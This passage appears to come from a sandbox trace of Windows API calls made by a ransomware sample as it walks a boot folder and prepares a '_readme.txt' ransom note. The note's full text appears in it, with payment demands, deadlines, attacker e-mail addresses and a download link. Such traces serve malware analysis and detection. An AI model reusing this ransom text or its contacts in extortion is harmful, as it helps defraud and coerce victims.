Flags=0x0, Size=0x840) returned 0x2d154b0 [0175.007] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.007] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.007] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.007] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0175.007] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.007] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.007] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.007] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0175.008] PathFindFileNameW (pszPath="C:\\Boot\\pl-PL\\") returned="pl-PL\\" [0175.008] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.008] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0175.008] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0175.008] PathFindFileNameW (pszPath="") returned="" [0175.008] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.008] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0175.008] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0175.008] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x800) returned 0x2d2ec90 [0175.008] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2d2ec90 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0175.009] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x810) returned 0x2d154b0 [0175.009] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.009] FreeLibrary (hLibModule=0x759d0000) returned 1 [0175.009] PathAppendW (in: pszPath="C:\\Boot\\pl-PL\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\pl-PL\\_readme.txt") returned 1 [0175.009] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.009] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.009] PathFileExistsW (pszPath="C:\\Boot\\pl-PL\\_readme.txt") returned 0 [0175.009] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d00) returned 0x2d30670 [0175.009] lstrcpyW (in: lpString1=0x2d30670, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0175.009] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0175.009] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d16e48 [0175.009] CreateFileW (lpFileName="C:\\Boot\\pl-PL\\_readme.txt" (normalized: "c:\\boot\\pl-pl\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0175.010] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d16e48 | out: hHeap=0x6a0000) returned 1 [0175.010] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d30670 | out: hHeap=0x6a0000) returned 1 [0175.011] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.011] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.011] FindFirstFileW (in: lpFileName="C:\\Boot\\pl-PL\\*" (normalized: "c:\\boot\\pl-pl\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28dd07a0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0175.012] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.012] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28dd07a0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0175.012] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe9e5ad4a, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0175.012] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe9e5ad4a, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0175.012] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0175.012] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.013] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d276f8 | out: hHeap=0x6a0000) returned 1 [0175.013] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d276f8 [0175.013] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0175.013] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.013] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.013] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.013] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.013] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.013] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.014] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.014] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.014] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.014] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.014] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.015] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.015] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.015] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.015] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.016] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.016] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.016] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.016] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.016] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.016] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.016] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0175.017] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.017] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.017] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.017] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.017] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0175.017] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.018] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.018] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.018] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.018] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.018] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.019] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.019] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.019] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0175.019] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.019] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.019] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.019] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0175.020] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.020] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.020] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.020] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0175.020] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.021] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.021] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.021] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.021] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.021] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.021] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.021] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.022] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.022] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.022] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.022] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0175.022] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.023] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.023] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.023] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0175.023] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.023] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.023] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.023] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.024] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.024] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.024] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.024] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.024] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.025] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.025] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.025] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.025] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.025] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.025] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.025] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.026] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.026] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.026] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.026] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.026] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.027] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.027] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.027] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.027] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.027] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.027] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.027] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.028] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.028] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.028] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.028] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.028] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0175.028] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.029] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.029] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.029] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.029] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.029] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.030] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.030] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.030] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.030] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0175.030] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.030] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.031] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.031] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.031] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0175.031] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.031] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.031] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.031] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0175.032] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.032] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.032] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.032] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.057] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.057] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.057] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.057] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.058] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.058] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.058] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.058] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.058] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0175.058] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.059] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.059] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.059] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.059] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0175.059] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: 